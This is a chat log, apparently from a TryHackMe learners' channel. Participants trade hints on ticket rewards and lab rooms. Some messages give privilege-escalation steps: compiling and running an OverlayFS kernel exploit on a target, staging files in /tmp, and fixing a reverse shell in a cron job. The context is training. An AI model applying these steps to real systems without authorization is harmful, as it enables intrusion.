@lusty bolt ||sS just says SYN scan, and then you would --ports 23 or whatever. there's a combination command available that they're looking for ||
oh
How many days are these tickets we are given valid?
i think until the 27th you can earn them
@upper field so i double checked on mine, and it works. i'll send a screenshot of mine in case you want to just check it out
use this command:
man nmap | grep -i "tcp syn ping"
@sterile crescent Top man thank you
Gave +1 Rep to @sterile crescent
i got the answer ..lol
give me the few steps plz start ssh,then what
this was the worst question ever asked
@upper field ||try and get it yourself to see what you're doing wrong there||
no there are more questions like that lol
ill try manually type it instead of copy and paste
No I meant like do they get expired or sth
which exploit are you using? can you link it
i dont know with that
NoOOOOOooooooooOOOooOOOoOOoOOOooO
look if there's anything i've learned from messing up on things, always ls -la and check it can exploit
only ticket part is expired, room stays
I'm gonna subscribe tomorrow ! I'm tired of getting single tickets
I mean like suppose I have tickets and I haven't redeemed them yet so if I don't redeem do they get vanished or become unusable?
logically yes
So until when is that?
okay so the top of this exploit shows usage || gcc ofs.c -o ofs you have to infer a bit with it. ofs.c is the c file that the rest of the code goes into (since its an OverlayFS vulnerability). you compile into ofs and then run it ./ofs and it should be good ||
They are available I mean
i believe it doesn't depend on the subscription, i got an oscp ticket when i had one ticket only
yeah but getting more tickets is helpful, although my ticket page is painful and i have only windows privesc left, so i don't think ill get anything
U made a good point lol
me too after subscription
ye but how can i run it on ssh not on my local machine
pentester title 1/7 day freeze
Idk what am I supposed to do with these extra pentester title tickets
don't download the code, copy paste into a file on the target
i didn't get u
I mean if there was an option to donate or sth
i mean if you get 2 per room it doesn't mean that you have a good chance
who knows it may happen
I have 2 more tickets to get, 1 more task for that
Any one else's jus crash out when u try claim tickets now lol
permission denied
are you in a writable directory? or an executable directory?
try not to get discouraged
idk which room u are doing but it's better to move to /tmp and give the perms (in most of the cases)
finished
changing permissions Operation not permitted
@rough ore 
and no major prizes but didn't really expect any
Congrats
sad
I got 2 more tickets coming and I'm hoping for an eJPT myself
but I know it's unlikely
good luck
I got 3 for HAK5 WiFi
btw, how many can get oscp? what's the limit?
changing permissions of ‘/home’: Operation not permitted
could you please read my reply once
why's the task 8 on sqli room so long 
are they claimed? 
think theres a good chance most would give a kidney for a pineapple
changing permissions of \tmp: Operation not permitted
@rough ore do it in /tmp
move to that directory to make the code, don't change the perms of it
lol! i meant, move the file to /tmp and change the file permission there
figured it out!!! finally
Well, I hope I get it, I already sent the email! 
how can i move file to ssh if i get always permission denied
hey guys i can't get this "directory listing" in walking-an-application section :/
umm which task?
3
I can help when I get home. it'll be like 15 minutes
damn! i forgot ! wait lemme re do it
Well done mate
np
i don't understand the accessing flag.txt file
dm me
permission denied
which room?
which task ?
linux privesc kernel
number ?
5
task 5 flag1
are u sure u read everything?
yes im stuck almost 4 hours
i finished it but i will give it a try to help you
give me steps or flag idk im tired
loll! i'll give u hints
why do i feel like u didn't read properly
im on the karen account and all commands permission denied
if you need the flag i will give it to you but you will learn nothing from this and you just wasted 4 hours
we're not gonna do it for you, but we can help guide you there
i will give you hints just wait to give it a look
The Kernel exploit methodology is simple:
Identify the kernel version
Search and find an exploit code for the kernel version of the target system
Run the exploit
you did the first step
right?
also the second
?
first and second, having issues with 3rd
ye but i need to run exploit on target machine right?how can i copy to it or run from target not from local
share the exploit
well go to /tmp
then mkdir lol
then cd lol
echo "lol"
permission denied lol
u aren't getting us
how and you are the owner
you dont have permission to cd?
on target machine denied not on local
someone have problem with reverse shell Task9 linux privesc
can you give us a screen shot
when you are trying to type cd lol
damn ! damn damn ! this was fuckin irritating..but the stuff is simple
i can help, what's the issue?
just finished up the command injection room that one i really enjoyed!
- make sure u gave the execute perms
- replace sh with bash
- stay calm
crontab doesn't work, my reverse shell work locally but, with the cronjob,
it works fine ? where is the permission denied issue ?
check ls -la
lol! everything's lol
ye then what mkdir exploit and how can i copy
https://tryhackme.com/room/winprivesc Task 6 2nd question, there is no subfolder in unquotedsvc binary path or am I missing something
cp /path/to/the/exploit /tmp/yourfolder 
i was responding with that to someone else's question
last 3 questions my brain is melting
i never tried win privesc. Is that as simple as linux privesc?
np
i don't like windows so im having a lot more trouble with it, although i grew up on unix my whole life so thats probably why for me
i've heard from others that windows is in general easier
working with linux, windows feels like a pain in the ... especially with powershell
the powershell commands are horrible to me ...idk why
powershell terminology is built completely differently
yeah
and for the windows you get direct access, not from the attackbox or kali
gotta practise more powershell
permission denied
does anybody have oscp here? i wonder if oscp requires a good amount of win privesc knowledge
try to cd first inside your folder then run wget
this one on windows privesc is very good
lol
LOL
i dont have it, but i have a friend who has it. it definitely needs a good amount of windows knowledge, because most systems nowadays are windows
LOL
it didn't work